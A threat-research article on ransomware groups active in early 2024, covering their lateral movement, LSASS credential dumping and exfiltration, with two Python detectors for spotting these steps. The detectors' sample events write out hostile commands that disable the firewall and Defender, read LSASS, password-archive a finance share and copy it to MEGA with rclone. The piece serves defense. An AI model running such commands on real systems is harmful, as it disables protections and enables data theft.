By understanding the methods and strategies of ransomware groups, companies can better fortify their defenses.
Since 2015, ransomware has been a threat that organizations and enterprises cannot afford to ignore, and the exposure grows as critical infrastructure (CI) sectors digitalize. With IT and OT convergence, OT environments have become targets too. In 2023, ransomware was the most frequent type of incident reported in OT environments, ahead of missing security updates and APT activity.[1] Ransomware groups also keep refining their business model: beyond encryption and data theft, they have recently adopted triple and quadruple extortion tactics.
In response to these escalating threats, the threat research team at TXOne Networks investigated the current ransomware landscape, using open-source intelligence and the ransom blogs (leak sites) that ransomware groups themselves operate as the main sources.[2][3][4][5][6] The result is a list of the most active ransomware groups in the first half of 2024. By understanding the methods and strategies of these groups, industries can use this analysis to better fortify their defenses and mitigate the risks that come with the digital transformation of essential services.
Figure 1 shows the ransomware groups active in the first half of 2024, ranked by the number of victims posted on the groups' own ransom blogs. Many well-known groups have kept their high rankings. To maximize financial gain, however, ransomware groups are continually evolving their tactics. Research into the attack strategies and techniques used by active groups such as LockBit, Play, Black Basta, 8base, and Akira over the past year revealed the following trends:
Fig. 1: Ransomware attacks in the first half of 2024, categorized by group. Note: These statistics are based on claims made by the ransomware groups themselves, which may not always align perfectly with real incidents.
Initial Access Brokers (IABs) are threat actors who specialize in breaking into organizational systems and networks. Rather than carrying out attacks themselves, IABs profit by selling the access they obtain to other malicious actors. Pricing is set by the size of the target and the category of access being sold.
Recent cases show that ransomware groups frequently obtain victim credentials through IABs, including credentials for cloud or VPN service accounts. Unfortunately, these technologies are already widely adopted in modern CI sectors:
Ransomware groups often buy access to computers already compromised by initial access brokers. These hosts typically expose legitimate remote services that can be abused for lateral movement. Once the attackers obtain local administrator privileges on a compromised computer, they commonly dump credentials from LSASS memory or from domain cached credentials to harvest valid accounts, then connect directly to other devices over services such as RDP or SMB, spreading ransomware throughout the organization's network.
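The lateral movement described above leaves a distinctive trace in Windows Security logs: one source host and one account producing network (LogonType 3, SMB/admin shares) or RemoteInteractive (LogonType 10, RDP) logons on many different machines within minutes. The following detection is an added example written for this article, not TXOne's tooling, and runs over constructed 4624 records written as `key=value;...` lines (the field names follow the real 4624 event; the hosts, IPs and account names are invented):

```python
"""Flag logon fan-out typical of RDP/SMB lateral movement with dumped credentials.

Added example; the 4624 records below are constructed, not real telemetry.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Logon types that reach a remote host with a credential: 3 = network (SMB,
# admin shares, WMI), 10 = RemoteInteractive (RDP). Type 2 (console) is ignored.
LATERAL_LOGON_TYPES = {3: "network (SMB/admin shares)", 10: "RemoteInteractive (RDP)"}

# Constructed sample. 10.0.5.23 authenticates as svc_backup to six hosts in
# under three minutes over NTLM; j.doe's logons are normal daily activity.
SAMPLE_4624 = [
    "time=2024-03-11T02:01:10;Computer=FS01;TargetUserName=svc_backup;LogonType=3;IpAddress=10.0.5.23;AuthenticationPackageName=NTLM",
    "time=2024-03-11T02:01:12;Computer=FS02;TargetUserName=svc_backup;LogonType=3;IpAddress=10.0.5.23;AuthenticationPackageName=NTLM",
    "time=2024-03-11T02:01:40;Computer=ENG-WS7;TargetUserName=svc_backup;LogonType=3;IpAddress=10.0.5.23;AuthenticationPackageName=NTLM",
    "time=2024-03-11T02:02:05;Computer=HMI-03;TargetUserName=svc_backup;LogonType=10;IpAddress=10.0.5.23;AuthenticationPackageName=NTLM",
    "time=2024-03-11T02:03:30;Computer=DC02;TargetUserName=svc_backup;LogonType=3;IpAddress=10.0.5.23;AuthenticationPackageName=NTLM",
    "time=2024-03-11T02:03:58;Computer=HIST01;TargetUserName=svc_backup;LogonType=3;IpAddress=10.0.5.23;AuthenticationPackageName=NTLM",
    "time=2024-03-11T08:00:00;Computer=ENG-WS7;TargetUserName=j.doe;LogonType=2;IpAddress=127.0.0.1;AuthenticationPackageName=Negotiate",
    "time=2024-03-11T08:05:10;Computer=FS01;TargetUserName=j.doe;LogonType=3;IpAddress=10.0.7.4;AuthenticationPackageName=Kerberos",
    "time=2024-03-11T13:20:00;Computer=FS02;TargetUserName=j.doe;LogonType=3;IpAddress=10.0.7.4;AuthenticationPackageName=Kerberos",
    "time=2024-03-11T16:40:00;Computer=DC02;TargetUserName=j.doe;LogonType=3;IpAddress=10.0.7.4;AuthenticationPackageName=Kerberos",
    "time=2024-03-11T17:01:00;Computer=HIST01;TargetUserName=j.doe;LogonType=3;IpAddress=10.0.7.4;AuthenticationPackageName=Kerberos",
]


def parse_4624(line):
    """Parse one constructed 'key=value;...' record into a dict with typed fields."""
    rec = dict(kv.split("=", 1) for kv in line.strip().split(";"))
    rec["time"] = datetime.fromisoformat(rec["time"])
    rec["LogonType"] = int(rec["LogonType"])
    return rec


def find_fanout(lines, window=timedelta(minutes=10), threshold=5):
    """Alert on (source IP, account) pairs that log on to >= threshold distinct
    hosts via RDP/SMB inside any window-long span. Returns one alert per pair,
    describing the densest window observed."""
    by_actor = defaultdict(list)
    for rec in map(parse_4624, lines):
        if rec["LogonType"] in LATERAL_LOGON_TYPES:
            by_actor[(rec["IpAddress"], rec["TargetUserName"])].append(rec)

    alerts = []
    for (ip, user), recs in by_actor.items():
        recs.sort(key=lambda r: r["time"])
        best = None
        start = 0
        for end, rec in enumerate(recs):
            # Slide the window so recs[start:end+1] spans at most `window`.
            while rec["time"] - recs[start]["time"] > window:
                start += 1
            span = recs[start:end + 1]
            hosts = {r["Computer"] for r in span}
            if best is None or len(hosts) > len(best["hosts"]):
                best = {"hosts": hosts, "first": span[0]["time"], "last": span[-1]["time"],
                        "auth": {r["AuthenticationPackageName"] for r in span}}
        if best and len(best["hosts"]) >= threshold:
            alerts.append({
                "source_ip": ip,
                "account": user,
                "hosts": sorted(best["hosts"]),
                "first": best["first"].isoformat(),
                "last": best["last"].isoformat(),
                "auth_packages": sorted(best["auth"]),
            })
    return alerts


if __name__ == "__main__":
    for a in find_fanout(SAMPLE_4624):
        print(f"{a['account']}@{a['source_ip']} reached {len(a['hosts'])} hosts "
              f"between {a['first']} and {a['last']} via {a['auth_packages']}: {a['hosts']}")
```

The threshold and window should be tuned per environment: backup and patch-management service accounts legitimately fan out, so allowlist them by account and expected source host rather than raising the threshold for everyone. A run of NTLM-only logons from a workstation is a second useful signal, because pass-the-hash cannot use Kerberos.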
As mentioned earlier, ransomware groups raise the pressure on victims by stealing data before encrypting it, which enables triple extortion: they threaten to leak the data, harass the victim's customers, and pressure upstream and downstream suppliers. Worryingly, the exfiltration itself is often done with legitimate software, such as the Rclone sync tool or the MEGA cloud storage client, so the transfer blends in with ordinary cloud traffic and is hard to distinguish from normal use.
The threat research team has compiled a summary of the attack techniques used by active ransomware groups in the first half of 2024, shown in Table 1. The summary covers LockBit, Play, Black Basta, 8base, and Akira. Each number in a cell indicates how often the listed groups were observed using that technique, and techniques common across the groups are highlighted in orange. The picture is one of financially motivated attacks that rely on widespread, well-known techniques to maximize impact and profit. With ransomware groups increasingly learning from each other and sharing knowledge and tooling, their tactics are converging. Several of the observed techniques are elaborated below:
Table 1: Techniques Used by Active Ransomware Groups in MITRE ATT&CK v15.1
As previously mentioned, ransomware groups use Initial Access Brokers to obtain access to organizational networks. Consequently, during the Initial Access phase they often already hold valid accounts for remote services on compromised computers. In the Execution phase, the Command and Scripting Interpreter technique dominates: its PowerShell and Windows Command Shell sub-techniques let the groups work with system-native tools (living off the land), which lowers the chance that security personnel notice anything unusual.
In the Defense Evasion phase, different ransomware groups draw on a diverse toolbox. The most common entries are two sub-techniques of Impair Defenses: Disable or Modify System Firewall and Disable or Modify Tools. The first opens up or switches off the host firewall so that RDP, SMB and other lateral-movement traffic is not blocked; the second disables or alters antivirus and EDR software on the compromised device. Together they remove network restrictions and reduce the likelihood that later activity is detected.
Once attackers hold local administrator privileges on a victim's computer, they use OS Credential Dumping to harvest credentials that are valid on other devices, and then log in to those devices over familiar services such as RDP or SMB. Within OS Credential Dumping, nearly every ransomware group targets LSASS Memory. The technique works because, when a user logs on, the Local Security Authority Subsystem Service (LSASS) caches credential material for that session (NTLM hashes, Kerberos tickets, and in older configurations plaintext passwords). An attacker with administrator rights, which carry the SeDebugPrivilege needed to read another process's memory, can dump that memory and reuse the credentials to move laterally. Practical countermeasures include running LSASS as a protected process (RunAsPPL), enabling Credential Guard, disabling WDigest, and keeping local administrator rights off ordinary workstations.
Lastly, to go beyond double extortion, ransomware groups steal internal data from the victim organization. Before transfer they use Archive Collected Data, typically with utilities such as 7-Zip or WinRAR, to compress the stolen files and often to password-protect the archive. Compression shrinks the volume sent over the network, and encryption of the archive keeps content-inspection controls from seeing what is leaving, making the exfiltration less likely to be detected.
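The four phases above (defense evasion, LSASS access, archiving, exfiltration) are all visible in ordinary endpoint telemetry. The following is an added example, written for this article rather than taken from TXOne's detection content, that maps constructed Sysmon-style events (Event ID 1 = process creation, Event ID 10 = process access) to the ATT&CK IDs used in Table 1. The regular expressions are deliberately minimal illustrations, not a complete rule set, and the paths, user names and tool names in the sample events are invented:

```python
"""Map Sysmon-style endpoint events to the ATT&CK techniques discussed above.

Added example; SAMPLE_EVENTS is constructed, and the rules are illustrative only.
"""
import re

# Command-line rules for Sysmon Event 1 (process creation).
CMDLINE_RULES = [
    ("T1562.004", "Impair Defenses: Disable or Modify System Firewall",
     re.compile(r"netsh\s+advfirewall\s+.*(state\s+off|add\s+rule\b.*action=allow)", re.I)),
    ("T1562.001", "Impair Defenses: Disable or Modify Tools",
     re.compile(r"(Set-MpPreference\s+-Disable\w+Monitoring|"
                r"sc(\.exe)?\s+(stop|config)\s+\S*(defend|sense|av)\w*|"
                r"taskkill\b.*(msmpeng|avp|ccsvchst)\.exe)", re.I)),
    ("T1560.001", "Archive Collected Data: Archive via Utility",
     # archive created with a password (-p / -hp), the usual pre-exfil step
     re.compile(r"(7z|7za|rar|winrar)(\.exe)?\s+a\b.*\s-(p|hp)\S+", re.I)),
    ("T1567.002", "Exfiltration Over Web Service: Exfiltration to Cloud Storage",
     re.compile(r"(rclone(\.exe)?\s+(copy|sync|move)\b|megacmd|megaput)", re.I)),
]

# Sysmon Event 10: reading LSASS memory needs PROCESS_VM_READ (0x0010) in the
# granted access mask (typical dump masks are 0x1010, 0x1410, 0x1FFFFF).
LSASS_VM_READ = 0x0010
# Hypothetical allowlist by image name; a production rule keys on the full
# signed path, since a basename is trivially spoofed.
LSASS_SOURCE_ALLOWLIST = {"msmpeng.exe", "csrss.exe", "wininit.exe", "services.exe", "lsass.exe"}

# Constructed sample stream: one intrusion by svc_backup, plus benign noise.
SAMPLE_EVENTS = [
    {"EventID": 1, "User": "CORP\\svc_backup", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c netsh advfirewall set allprofiles state off"},
    {"EventID": 1, "User": "CORP\\svc_backup", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -nop -w hidden -c "Set-MpPreference -DisableRealtimeMonitoring $true"'},
    {"EventID": 10, "User": "CORP\\svc_backup", "SourceImage": r"C:\Users\Public\pd.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "User": "NT AUTHORITY\\SYSTEM", "SourceImage": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 1, "User": "CORP\\svc_backup", "Image": r"C:\Program Files\7-Zip\7z.exe",
     "CommandLine": r"7z.exe a -pS3cret! -mhe=on C:\Users\Public\fin.7z \\FS01\finance\\"},
    {"EventID": 1, "User": "CORP\\svc_backup", "Image": r"C:\Users\Public\rclone.exe",
     "CommandLine": r"rclone.exe copy C:\Users\Public\fin.7z mega:drop --transfers 8"},
    {"EventID": 1, "User": "CORP\\j.doe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\j.doe\notes.txt"},
]


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return [(technique_id, name, evidence), ...] for a single event."""
    hits = []
    if event["EventID"] == 1:
        for tid, name, rx in CMDLINE_RULES:
            if rx.search(event["CommandLine"]):
                hits.append((tid, name, event["CommandLine"]))
    elif event["EventID"] == 10 and basename(event["TargetImage"]) == "lsass.exe":
        access = int(event["GrantedAccess"], 16)
        if access & LSASS_VM_READ and basename(event["SourceImage"]) not in LSASS_SOURCE_ALLOWLIST:
            hits.append(("T1003.001", "OS Credential Dumping: LSASS Memory",
                         f"{event['SourceImage']} GrantedAccess={event['GrantedAccess']}"))
    return hits


def kill_chain(events):
    """Per user, the ordered, de-duplicated technique IDs observed, so an analyst
    sees the evasion -> credential access -> collection -> exfiltration chain."""
    chains = {}
    for ev in events:
        for tid, _name, _evidence in classify(ev):
            seq = chains.setdefault(ev["User"], [])
            if tid not in seq:
                seq.append(tid)
    return chains


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        for tid, name, evidence in classify(ev):
            print(f"{ev['User']:22} {tid:10} {name}: {evidence}")
    print(kill_chain(SAMPLE_EVENTS))
```

None of these signals is conclusive on its own (administrators do run `netsh advfirewall`, and backup agents do read LSASS), which is why the chain view matters: a single account that disables the firewall and real-time protection, reads LSASS, builds a password-protected archive and then invokes rclone within one session is far more actionable than any one of those events.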
Since ransomware groups are adopting widespread attack strategies, even critical infrastructure (CI) sectors have found themselves in the crosshairs. This is particularly alarming because these are the sectors that can impact national security or society at large. Several CI-related incidents in the first half of 2024 include:
These incidents highlight the danger ransomware groups pose to CI sectors. As variants from different groups continue to proliferate, defenses that rely on a single detection method, such as signatures for known samples, have struggled to keep up. The problem is especially acute in CI, where legacy systems, long patch cycles and availability requirements limit which controls can be deployed.
In response, it is important to implement detection and protection mechanisms tailored to each environment. Fortunately, the attack strategies of modern ransomware groups are becoming clearer. OT environments, whose runtime behaviour changes very little, are particularly well suited to Cyber-Physical System Detection and Response (CPSDR): a known-good operational baseline is established and any unexpected system change is blocked before it affects operations. Because this does not depend on recognizing a specific sample, even new ransomware variants can be stopped preemptively, without waiting for a threat to be identified and analyzed first, which keeps defenders ahead of the spread of an attack.
According to the groups' own victim listings, the cumulative victims of the first half of 2024 included organizations targeted by highly active groups such as LockBit, Play, Black Basta, 8base, Medusa and Akira. Their attacks hit critical infrastructure (CI) industries, with some of the most impactful incidents affecting the healthcare, critical manufacturing, financial, and transportation sectors. The far-reaching impact of these attacks has even drawn the attention of the US Congress and the White House.
As noted in TXOne's ICS/OT Threat Hunting Report, threat actors continue to specialize: ransomware groups buy access to organizational or enterprise networks from Initial Access Brokers to improve their efficiency, and as they learn from each other their playbooks converge and become easier to anticipate.
To lower the odds of detection and of recovery by security personnel, ransomware groups use a wide range of techniques under the Defense Evasion tactic. Despite this diversity, the Disable or Modify System Firewall and Disable or Modify Tools sub-techniques remain a fixture of their attack strategies.
Because most ransomware attacks are financially motivated, CI sectors that affect national security or societal wellbeing have become prime targets: the threat of disrupting essential services raises the stakes and pressures victims to pay. Moreover, the technological limitations common in CI sectors make it hard to find a single countermeasure that mitigates every threat. To face both known ransomware and unknown variants, we should not wait for a threat to be identified and analyzed before responding; a proactive approach such as CPSDR, which blocks unexpected changes against a known-good baseline, protects OT environments from the spread of ransomware.